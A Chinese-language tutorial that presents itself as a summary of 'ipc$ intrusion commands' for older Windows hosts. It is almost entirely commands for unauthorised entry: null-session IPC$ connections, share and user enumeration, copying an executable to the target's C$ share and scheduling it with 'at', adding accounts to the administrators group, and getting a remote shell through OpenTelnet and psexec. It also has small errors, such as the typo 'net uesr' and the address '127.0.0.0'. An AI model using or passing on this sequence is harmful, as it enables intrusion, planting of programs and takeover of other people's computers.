ipc$入侵命令是適用于本地還是遠程，如果只適用于本地，你只能在獲得遠程主機的shell（如cmd，telnet等）后，才能向遠程主機執行。

ipc$入侵命令1 建立/刪除ipc$連接的命令

1）建立空連接:

net use \\127.0.0.1\ipc$ "" /user:"" 

2）建立非空連接:

net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名" 

3）刪除連接:

net use \\127.0.0.1\ipc$ /del

2 在ipc$連接中對遠程主機的操作命令

1） 查看遠程主機的共享資源（看不到默認共享）:

net view \\127.0.0.1 

2） 查看遠程主機的當前時間:

net time \\127.0.0.1 

3） 得到遠程主機的netbios用戶名列表:

nbtstat -A 127.0.0.1 

4）映射/刪除遠程共享:

net use z: \\127.0.0.1\c 

此命令將共享名為c的共享資源映射為本地z盤 

net use z: /del 

刪除映射的z盤，其他盤類推

5）向遠程主機復制文件:

copy 路徑\文件名 \\IP\共享目錄名，如：

copy c:\xinxin.exe \\127.0.0.1\c$ 即將c盤下的xinxin.exe復制到對方c盤內

當然，你也可以把遠程主機上的文件復制到自己的機器里：

copy \\127.0.0.1\c$\xinxin.exe c:\

6）遠程添加計劃任務:

at \\IP 時間 程序名 如：

at \\127.0.0.0 11:00 xinxin.exe

注意：時間盡量使用24小時制；如果你打算運行的程序在系統默認搜索路徑（比如system32/）下則不用加路徑，否則必須加全路徑

ipc$入侵命令3 本地命令

1）查看本地主機的共享資源（可以看到本地的默認共享）

net share

2）得到本地主機的用戶列表

net user

3）顯示本地某用戶的帳戶信息

net user 帳戶名

4）顯示本地主機當前啟動的服務

net start 

5）啟動/關閉本地服務

net start 服務名 

net stop 服務名 

6）在本地添加帳戶

net user 帳戶名 密碼 /add

7）激活禁用的用戶

net uesr 帳戶名 /active:yes

8）加入管理員組

net localgroup administrators 帳戶名 /add 

很顯然的是，雖然這些都是本地命令，但如果你在遠程主機的shell中輸入，比如你telnet成功后輸入上面這些命令，那么這些本地輸入將作用在遠程主機上。

ipc$入侵命令4 其他一些命令

1）telnet 

telnet IP 端口

telnet 127.0.0.0 23

2）用opentelnet.exe開啟遠程主機的telnet

OpenTelnet.exe \\ip 管理員帳號 密碼 NTLM的認證方式 port

OpenTelnet.exe \\127.0.0.1 administrator "" 1 90

不過這個小工具需要滿足四個要求：

1）目標開啟了ipc$共享

2）你要擁有管理員密碼和帳號

3）目標開啟RemoteRegistry服務，用戶就可以更改ntlm認證

4）對僅WIN2K/XP有效

3）用psexec.exe一步獲得shell，需要ipc管道支持

psexec.exe \\IP -u 管理員帳號 -p 密碼 cmd

psexec.exe \\127.0.0.1 -u administrator -p "" cmd

ipc$入侵命令就為大家總結到這里，希望你能掌握。